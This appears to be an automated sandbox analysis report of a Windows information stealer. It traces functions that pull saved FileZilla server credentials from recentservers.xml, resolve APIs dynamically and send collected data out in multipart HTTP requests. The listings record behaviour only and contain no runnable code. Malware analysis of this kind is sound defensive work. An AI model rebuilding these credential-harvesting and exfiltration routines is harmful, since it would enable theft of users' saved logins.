                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                        • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                      • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                        • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                        • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                      • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                      • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                      • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                      • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                      • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                      • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                      • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                      • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                      • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                      • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                      • memset.MSVCRT ref: 0040EF17
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                      • API String ID: 337689325-555421843
                                                                                                      • Opcode ID: f61a0a8ac0e376edc301393d108ce5b5714eb9167b63e20ed43b5770ef7cfe15
                                                                                                      • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                      • Opcode Fuzzy Hash: f61a0a8ac0e376edc301393d108ce5b5714eb9167b63e20ed43b5770ef7cfe15
                                                                                                      • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 162 415ed0-415ee4 call 415dc0 165 416103-416162 LoadLibraryA * 5 162->165 166 415eea-4160fe call 415df0 GetProcAddress * 21 162->166 168 416164-416178 GetProcAddress 165->168 169 41617d-416184 165->169 166->165 168->169 171 4161b6-4161bd 169->171 172 416186-4161b1 GetProcAddress * 2 169->172 173 4161d8-4161df 171->173 174 4161bf-4161d3 GetProcAddress 171->174 172->171 175 4161e1-4161f4 GetProcAddress 173->175 176 4161f9-416200 173->176 174->173 175->176 177 416231-416232 176->177 178 416202-41622c GetProcAddress * 2 176->178 178->177
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96D58), ref: 00415F11
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96D28), ref: 00415F2A
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96D70), ref: 00415F42
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96D88), ref: 00415F5A
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96DA0), ref: 00415F73
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBD968), ref: 00415F8B
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE048), ref: 00415FA3
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE348), ref: 00415FBC
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96DB8), ref: 00415FD4
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF718), ref: 00415FEC
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF748), ref: 00416005
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF628), ref: 0041601D
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE1A8), ref: 00416035
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF598), ref: 0041604E
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF5B0), ref: 00416066
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE0E8), ref: 0041607E
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF688), ref: 00416097
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF730), ref: 004160AF
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE108), ref: 004160C7
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF4C0), ref: 004160E0
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBDFC8), ref: 004160F8
                                                                                                      • LoadLibraryA.KERNEL32(02DBF640,?,004136C0), ref: 0041610A
                                                                                                      • LoadLibraryA.KERNEL32(02DBF6B8,?,004136C0), ref: 0041611B
                                                                                                      • LoadLibraryA.KERNEL32(02DBF6D0,?,004136C0), ref: 0041612D
                                                                                                      • LoadLibraryA.KERNEL32(02DBF460,?,004136C0), ref: 0041613F
                                                                                                      • LoadLibraryA.KERNEL32(02DBF700,?,004136C0), ref: 00416150
                                                                                                      • GetProcAddress.KERNEL32(75A70000,02DBF658), ref: 00416172
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DBF670), ref: 00416193
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DBF5E0), ref: 004161AB
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DBF478), ref: 004161CD
                                                                                                      • GetProcAddress.KERNEL32(75450000,02DBE248), ref: 004161EE
                                                                                                      • GetProcAddress.KERNEL32(76E90000,02DBD978), ref: 0041620F
                                                                                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226
                                                                                                      Strings
                                                                                                      • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: NtQueryInformationProcess
                                                                                                      • API String ID: 2238633743-2781105232
                                                                                                      • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                      • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                      • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                      • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 179 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 202 404ee3 179->202 203 404eea-404eee 179->203 202->203 204 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 203->204 205 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 203->205 204->205 268 40500d-40501b 204->268 269 405029 268->269 270 40501d-405027 268->270 271 405033-405065 HttpOpenRequestA 269->271 270->271 272 40556b-405572 InternetCloseHandle 271->272 273 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 271->273 272->205 427 4054ea-405514 InternetReadFile 273->427 428 405516-40551d 427->428 429 40551f-405565 
InternetCloseHandle 427->429 428->429 430 405521-40555f call 416fb0 call 416ea0 call 416e00 428->430 429->272 430->427
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                      • StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                      • HttpOpenRequestA.WININET(00000000,02DD5050,?,02DD9608,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,02DD4FA0,00000000,?,02D91B60,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405417
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                      • memcpy.MSVCRT ref: 00405443
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                      • memcpy.MSVCRT ref: 0040546A
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                      • memcpy.MSVCRT ref: 004054A5
                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                      • String ID: ------$"$"$"$--$------$------$------
                                                                                                      • API String ID: 2633831070-2774362122
                                                                                                      • Opcode ID: 3699202b8c86c7d7bae2930d23856af2bcc7052f5afe070d448807b924fd9dab
                                                                                                      • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                      • Opcode Fuzzy Hash: 3699202b8c86c7d7bae2930d23856af2bcc7052f5afe070d448807b924fd9dab
                                                                                                      • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 438 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 453 4056d4-4056d8 438->453 454 4056cd 438->454 455 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 453->455 456 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 453->456 454->453 465 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 455->465 466 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 455->466 456->455 540 40585c-40586a 456->540 466->465 541 405878 540->541 542 40586c-405876 540->542 543 405882-4058b5 HttpOpenRequestA 541->543 542->543 544 405c63-405c6a InternetCloseHandle 543->544 545 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 543->545 544->455 654 405be2-405c0c InternetReadFile 545->654 655 405c17-405c5d InternetCloseHandle 654->655 656 405c0e-405c15 654->656 655->544 656->655 657 405c19-405c57 call 416fb0 call 416ea0 call 416e00 656->657 
657->654
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                      • StrCmpCA.SHLWAPI(?,02DD4F80), ref: 004056C3
                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,02DD4FB0,00000000,?,02D91B60,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                      • memcpy.MSVCRT ref: 00405B73
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                      • memcpy.MSVCRT ref: 00405BAB
                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                      • HttpOpenRequestA.WININET(00000000,02DD5050,?,02DD9608,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                      • String ID: "$"$------$------$------$-A$-A
                                                                                                      • API String ID: 148854478-602752961
                                                                                                      • Opcode ID: 20f318af1127fa3fc85e80c7073bb5cfd3b10ea22113a06a73a764af5392ed78
                                                                                                      • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                      • Opcode Fuzzy Hash: 20f318af1127fa3fc85e80c7073bb5cfd3b10ea22113a06a73a764af5392ed78
                                                                                                      • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1037 40a030-40a04c call 417070 1040 40a05d-40a071 call 417070 1037->1040 1041 40a04e-40a05b call 416e20 1037->1041 1046 40a082-40a096 call 417070 1040->1046 1047 40a073-40a080 call 416e20 1040->1047 1048 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1041->1048 1046->1048 1056 40a098-40a0b8 call 416e00 * 3 call 413220 1046->1056 1047->1048 1080 40a12d-40a134 1048->1080 1074 40a6cf-40a6d2 1056->1074 1081 40a170-40a184 call 416d40 1080->1081 1082 40a136-40a152 call 4170d0 * 2 CopyFileA 1080->1082 1087 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1081->1087 1088 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1081->1088 1094 40a154-40a16e call 416da0 call 415bd0 1082->1094 1095 40a16c 1082->1095 1147 40a319-40a331 call 4170d0 1087->1147 1088->1147 1094->1080 1095->1081 1155 40a680-40a692 call 4170d0 DeleteFileA call 417040 1147->1155 1156 40a337-40a355 1147->1156 1168 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 1155->1168 1163 40a666-40a67d 1156->1163 1164 40a35b-40a36f GetProcessHeap RtlAllocateHeap 1156->1164 1163->1155 1167 40a372-40a375 1164->1167 1171 40a37c-40a382 1167->1171 1168->1074 1174 40a601-40a60e lstrlen 1171->1174 1175 40a388-40a42a call 416d40 * 6 call 417070 1171->1175 1177 40a610-40a650 lstrlen call 416da0 call 401500 call 404dc0 call 416e00 1174->1177 1178 40a655-40a663 memset 1174->1178 1216 40a42c-40a43b call 416e20 1175->1216 1217 40a43d-40a446 call 416e20 1175->1217 1177->1178 1178->1163 1221 40a44b-40a45d call 417070 1216->1221 1217->1221 1224 40a470-40a479 call 416e20 1221->1224 
1225 40a45f-40a46e call 416e20 1221->1225 1228 40a47e-40a48e call 4170b0 1224->1228 1225->1228 1232 40a490-40a498 call 416e20 1228->1232 1233 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 1228->1233 1232->1233 1233->1167
                                                                                                      APIs
                                                                                                        • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02DBD9C8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                      • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                      • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                      • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                      • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                      • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                      • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                      • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                      • memset.MSVCRT ref: 0040A65D
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
